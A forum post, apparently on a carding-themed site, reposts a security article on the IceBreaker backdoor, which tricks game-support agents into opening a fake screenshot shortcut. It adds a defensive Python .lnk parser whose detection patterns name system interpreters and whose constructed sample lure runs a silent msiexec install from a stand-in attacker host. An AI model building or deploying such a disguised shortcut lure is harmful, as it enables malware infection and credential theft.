Viper Carder

Joined Feb 28, 2024
Once again social engineering is in use; this time the intruders are fooling support agents.

A hacker group is attacking companies involved in the development of online games using a previously unseen backdoor, which researchers have named « IceBreaker ».

Security Joes incident response experts believe that the IceBreaker backdoor relies on a « very specific social engineering technique ». The method is based on deceiving support agents. An attacker pretends to be a user who has run into a problem and sends a malicious screenshot to an employee in a chat. The employee has little choice but to download and open the file, because they need to help the user. That is how the support agent infects their own computer with the malware.

Figure: IceBreaker distribution and activation scheme ( Security Joes )
The name of the group behind these attacks remains unknown. However, according to Security Joes, this group has been using this approach since at least September 2026. So far the only public evidence of IceBreaker in use is a post on Twitter from MalwareHunterTeam in October.

The malicious image is usually hosted on a fake website that impersonates one of the popular hosting services, although researchers have also seen malicious screenshots stored in ordinary Dropbox storage.

The « image » itself is actually a malicious file with the « .lnk » extension: a regular Windows shortcut whose parameters spell out the malicious command.

Figure: Shortcut disguised as « .jpg »

As can be seen in the image above, the shortcut icon has been changed to make it look harmless. The shortcut contains a command that downloads a payload in « .msi » format from the attacker's server, installs it silently and launches it without any user interface.

The installer then extracts the malicious application « Port.exe », a 64-bit C++ executable, into « AppData\Local\Temp ».
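The lure described above is a Windows shell link whose StringData (relative path, arguments, icon) carries the real command while the file name and icon suggest an image. As an added, defender-side example that is not part of the article or of the Security Joes report, the following Python code parses the shortcut structures that matter for this check straight from the MS-SHLLINK layout, then applies a few heuristics drawn from the description: an image-like name ending in a hidden « .lnk », a custom icon on a shortcut that runs a system interpreter, a silent msiexec install from a remote URL, and a window launched minimized. The sample shortcuts, the « placeholder-c2.invalid » host and the file names are constructed for the example; the rule names and helper functions are this example's own.

```python
import re
import struct

# Windows shell-link (.lnk) constants from the MS-SHLLINK layout.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
SW_SHOWMINNOACTIVE = 7  # window is opened minimized and not activated
STRING_FIELDS = (  # StringData entries in on-disk order, with their LinkFlags bits
    (0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
    (0x20, "arguments"), (0x40, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and the StringData fields of a shell link.

    LinkTargetIDList and LinkInfo are skipped, so a shortcut whose target is
    expressed only as an IDList yields no path here; relative path, arguments
    and icon location are what the checks below need.
    """
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_ID_LIST:          # IDListSize (2 bytes) followed by the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


URL_RE = re.compile(r"https?://", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:q[nb]?!?|quiet)(?:\s|$)", re.IGNORECASE)
IMAGE_DOUBLE_EXT_RE = re.compile(r"\.(?:jpe?g|png|gif|bmp|webp)\.lnk$", re.IGNORECASE)
LOLBIN_RE = re.compile(r"(?:msiexec|cmd|powershell|wscript|mshta)(?:\.exe)?\b", re.IGNORECASE)


def assess_shortcut(filename: str, info: dict) -> list:
    """Return the reasons a shortcut resembles the screenshot lure (heuristics)."""
    launched = f"{info.get('relative_path', '')} {info.get('arguments', '')}"
    reasons = []
    if IMAGE_DOUBLE_EXT_RE.search(filename):
        reasons.append("image-like name with hidden .lnk extension")
    if LOLBIN_RE.search(launched) and info.get("icon_location"):
        reasons.append("custom icon on a shortcut that runs a system interpreter")
    if "msiexec" in launched.lower() and URL_RE.search(launched) and QUIET_RE.search(launched):
        reasons.append("silent msiexec install from a remote URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window launched minimized and unfocused")
    return reasons


def build_lnk(show_cmd: int, **fields) -> bytes:
    """Assemble a minimal Unicode .lnk (no IDList, no LinkInfo) for the samples."""
    flags = IS_UNICODE | sum(bit for bit, key in STRING_FIELDS if key in fields)
    header = struct.pack("<I16sIIQQQIIIHHII", 76, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(fields[key])) + fields[key].encode("utf-16-le")
                    for bit, key in STRING_FIELDS if key in fields)
    return header + body


# Constructed samples (not files from the report): a lure modelled on the
# article's description, and an ordinary application shortcut for contrast.
SAMPLES = {
    "screenshot.jpg.lnk": build_lnk(
        SW_SHOWMINNOACTIVE,
        relative_path=r"..\..\..\Windows\System32\msiexec.exe",
        arguments="/i https://placeholder-c2.invalid/screenshot.msi /qn",
        icon_location=r"%SystemRoot%\System32\imageres.dll"),
    "Notepad.lnk": build_lnk(1, relative_path=r"..\..\Windows\System32\notepad.exe"),
}


def scan(samples: dict) -> dict:
    """Map each shortcut name to the list of reasons it was flagged."""
    return {name: assess_shortcut(name, parse_lnk(data)) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", reasons or "no findings")
```

Run against a folder of attachments pulled from a support chat (`parse_lnk(open(path, "rb").read())`) the same checks apply unchanged; the parser deliberately skips the IDList, so a shortcut that names its target only there will show up through its arguments, icon and ShowCommand rather than through a path. Each heuristic on its own has benign matches (installers legitimately use `/qn`, shortcuts legitimately set icons), which is why the function returns all reasons and leaves the triage threshold to the caller.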

Figure: Port.exe file properties

After a thorough analysis, Security Joes found that the sample is a completely new backdoor written in Node.js. It gives the intruders the following capabilities:

  • extending the backdoor with plugins that add to its built-in functions;
  • adding the backdoor to Windows autorun;
  • enumerating Windows processes;
  • stealing passwords and cookies from local storage, in particular from Google Chrome;
  • starting a Socks5 reverse proxy server;
  • uploading files to a remote server over web sockets;
  • running custom VBS scripts;
  • taking screenshots;
  • creating remote shell sessions.
If the target organization has not outsourced customer support to an external provider, the intruders can use the backdoor to steal credentials, move laterally within the internal network and expand their presence in it.

Not much is known about IceBreaker, but Security Joes decided to publish this report and share all the detected indicators of compromise ( IoC ) to help antivirus companies learn to identify and eliminate the threat in a timely manner.